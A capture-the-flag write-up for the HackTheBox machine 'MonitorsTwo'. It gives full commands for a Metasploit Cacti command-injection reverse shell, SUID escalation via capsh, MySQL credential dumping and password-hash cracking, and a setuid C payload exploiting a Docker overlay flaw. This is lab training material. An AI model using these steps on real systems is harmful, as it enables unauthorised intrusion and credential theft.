MonitorsTwo
Write up for the HTB machine 'MonitorsTwo'
1. Initial recon
1.1. nmap
nmap -sC -sV 10.10.11.211
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Login to Cacti
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
1.2. nikto
nikto -host 10.10.11.211
+ Server: nginx/1.18.0 (Ubuntu)
+ /: Retrieved x-powered-by header: PHP/7.4.33.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ nginx/1.18.0 appears to be outdated (current is at least 1.20.1).
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ /install/install.php: Install file found.
+ /help.php: A help file was found.
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ /README.md: Readme Found.
1.3. website recon
while nikto
gave us some very interesting output, simply googling the software presented on the web application Cacti 1.2.22
we'll find that there's a metasploit exploit for it.
1.4. msfconsole
in msfconsole run search cacti
and then use 0
(exploit/linux/http/cacti_unauthenticated_cmd_injection)
for the options we want
set rport 80
set rhost 10.10.11.211
set target 0
set lhost YOUR_IP
then exploit
now we have a reverse shell as the user www-data
. if you don't get a shell the first time keep trying until you do.
1.5. root?
we can find SUID biaries using the following command find / -type f -perm -04000 -ls 2>/dev/null
from the output we can see that the SUID bit is set for the binary /sbin/capsh
, using GTFOBins we are able to escalate our privileges to root using the command /sbin/capsh --gid=0 --uid=0 --
but when we look in /root
there's nothing there... hmm
2. user.txt
As root we are able to run the script in the root directory entrypoint.sh
from that script we can then reset the admin user password using mysql mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET password=md5('admin') where username='admin'"
now we are able to login to the web application as the user admin
from there we can look at the configuration and find the username marcus
2.1. mysql
taking more inspriation from entrypoint.sh
we can run the following mysql commands to leak some credentials
mysql --host=db --user=root --password=root cacti -e 'show tables'
this will reveal to us the different tables that are stored in the mysql database
mysql --host=db --user=root --password=root cacti -e 'select * from user_auth'
and this will reveal to us all the entries in the table user_auth
which contains some credentials
copy hash of the password of the user marcus
and use johntheripper to crack the hash $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
finally we will have some credentials for the user markus:funkymonkey
ssh into the machine with credentials but keep your metasploit shell open too as we will need that for the root flag.
user.txt
can be found in /home/marcus
3. root.txt
after some enumeration of the file system we find an email in /var/mail/marcus
which talks about CVE-2021-41091
looking up this CVE we can find a proof of concept on Cyberark
To recreate this proof of concept for this machine:
run
findmnt
in themarcus
terminalhere we will find the path for the docker container where we have root, located at
/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
so move into that directory
now in the
root
terminal create the following c file
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
int main() {
setuid(0);
setgid(0);
system("/bin/bash");
return 0;
}
then we need to compile it with gcc gcc payload.c -o payload
and then set the capabilities of this binary setcap cap_setgid,cap_setuid+eip lol
back in the
marcus
terminal simply run the binary with./payload
and we are root!
root.txt
can be found in /root
Last updated
Was this helpful?